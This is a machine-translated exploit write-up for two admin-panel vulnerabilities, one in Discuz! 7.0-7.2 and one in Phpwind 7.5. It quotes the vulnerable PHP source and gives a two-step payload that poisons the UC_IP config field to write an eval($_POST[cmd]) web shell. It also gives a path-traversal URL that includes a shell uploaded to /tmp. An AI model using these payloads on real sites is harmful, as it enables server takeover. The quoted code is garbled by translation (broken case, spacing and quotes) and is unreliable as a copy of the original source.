Discuz! 7.0-7.2 & amp; Phpwind7.5 background chicken ribs Vulnerability

From Oldjun

Many people have it, spread it out, and then send it out. If the current vulnerability is published on its own initiative, it must be "no chicken ribs are not published". Otherwise, it must be hidden unless it is published by others. DZ requires the permissions of the creator (the Creator's password is generally difficult), and pw requires truncation (or linux writes a shell to tmp ).

I. shell Write Vulnerability in discuz background settings. inc. php:

If ($ operation = uc & is_writeable (./config. inc. php) & $ isfounder ){

$ Ucdbpassnew = $ settingsnew [uc] [dbpass] = ********? UC_DBPW: $ settingsnew [uc] [dbpass];

If ($ settingsnew [uc] [connect]) {

$ Uc_dblink = @ mysql_connect ($ settingsnew [uc] [dbhost], $ settingsnew [uc] [dbuser], $ ucdbpassnew, 1 );

If (! $ Uc_dblink ){

Cpmsg (uc_database_connect_error, error );

} Else {

Mysql_close ($ uc_dblink );

}

}

$ Fp = fopen (./config. inc. php, r );

$ Configfile = fread ($ fp, filesize (./config. inc. php ));

$ Configfile = trim ($ configfile );

$ Configfile = substr ($ configfile,-2) ==?> ? Substr ($ configfile, 0,-2): $ configfile;

Fclose ($ fp );

$ Connect =;

If ($ settingsnew [uc] [connect]) {

Require./config. inc. php;

$ Connect = mysql;

$ Samelink = ($ dbhost = $ settingsnew [uc] [dbhost] & $ dbuser = $ settingsnew [uc] [dbuser] & $ dbpw = $ ucdbpassnew );

$ Samecharset =! ($ Dbcharset = gbk & UC_DBCHARSET = latin1 | $ dbcharset = latin1 & UC_DBCHARSET = gbk );

$ Configfile = insertconfig ($ configfile, "/define (UC_DBHOST, s *.*?); /I "," define (UC_DBHOST ,". $ settingsnew [uc] [dbhost]. ");"); // regular expression indicates replacement from), and can be submitted at will, from oldjun.com

$ Configfile = insertconfig ($ configfile, "/define (UC_DBUSER, s *.*?); /I "," define (UC_DBUSER, ". $ settingsnew [uc] [dbuser]."); ");

$ Configfile = insertconfig ($ configfile, "/define (UC_DBPW, s *.*?); /I "," define (UC_DBPW, ". $ ucdbpassnew .");");

$ Configfile = insertconfig ($ configfile, "/define (UC_DBNAME, s *.*?); /I "," define (UC_DBNAME, ". $ settingsnew [uc] [dbname]."); ");

$ Configfile = insertconfig ($ configfile, "/define (UC_DBTABLEPRE, s *.*?); /I "," define (UC_DBTABLEPRE, '". $ settingsnew [uc] [dbname].'... $ settingsnew [uc] [dbtablepre]."); ");

// $ Configfile = insertconfig ($ configfile, "/define (UC_LINK, s *?. *??); /I "," define (UC_LINK, ". ($ samelink & $ samecharset? TRUE: FALSE ).");");

}

$ Configfile = insertconfig ($ configfile, "/define (UC_CONNECT, s *.*?); /I "," define (UC_CONNECT, $ connect );");

$ Configfile = insertconfig ($ configfile, "/define (UC_KEY, s *.*?); /I "," define (UC_KEY, ". $ settingsnew [uc] [key]."); ");

$ Configfile = insertconfig ($ configfile, "/define (UC_API, s *.*?); /I "," define (UC_API, ". $ settingsnew [uc] [api]."); ");

$ Configfile = insertconfig ($ configfile, "/define (UC_IP, s *.*?); /I "," define (UC_IP, ". $ settingsnew [uc] [ip]."); ");

$ Configfile = insertconfig ($ configfile, "/define (UC_APPID, s *?. *??); /I "," define (UC_APPID, ". $ settingsnew [uc] [appid]."); ");

$ Fp = fopen (./config. inc. php, w );

If (! ($ Fp = @ fopen (./config. inc. php, w ))){

Cpmsg (uc_config_write_error, error );

}

@ Fwrite ($ fp, trim ($ configfile ));

@ Fclose ($ fp );

}

Settings. inc. php does not effectively filter the submitted data, causing data to be written.) the data in the configuration file is contaminated, and the regular matching of insertconfig function cannot be correctly matched to the end, as a result, you can successfully bypass daddslashes and write the shell into the configuration file after two inputs.

Function insertconfig ($ s, $ find, $ replace ){

If (preg_match ($ find, $ s )){

$ S = preg_replace ($ find, $ replace, $ s); // replace data with regular expression matching

} Else {

$ S. = "". $ replace;

}

Return $ s;

}

Step 1: Write Contaminated Data to UC_IP (UC_IP is optional, which generally does not affect the program running): xxx); eval ($ _ POST [cmd])?> Submit;

Step 2: Enter aaa at will for UC_IP, and only match the regular expression). The pre-Semicolon is automatically closed.

Ii. phpwind background local vulnerability:

Vulnerability file: hackateadmin. php

Source code:

<? Php

! Function_exists (readover) & exit (Forbidden );

Define ("H_R", R_P. "hack/rate /");

Define ("L_R", R_P. "lib /");

InitGP (array (ajax ));

$ Action = strtolower ($ job )? $ Job: "admin ");

$ Filepath = H_R. "action/". $ action. "Action. php ";

(! File_exists ($ filepath) & exit ();

If ($ job! = "Ajax "){

Require H_R./template/layout. php;

} Else {

Require_once $ filepath;

}

?>

$ Job can be customized to trigger local inclusion, except addslashes, so it cannot be truncated through % 00; but it can be truncated through several, or write a shell directly in the tmp folder to include it. I will not talk about it more specifically. How to Use it:

First upload a shell named Action. php under tmp

Then visit: http://www.bkjia.com/pw/admin.php? Adminjob = hack & hackset = rate & typeid = 100 & job =.../../tmp/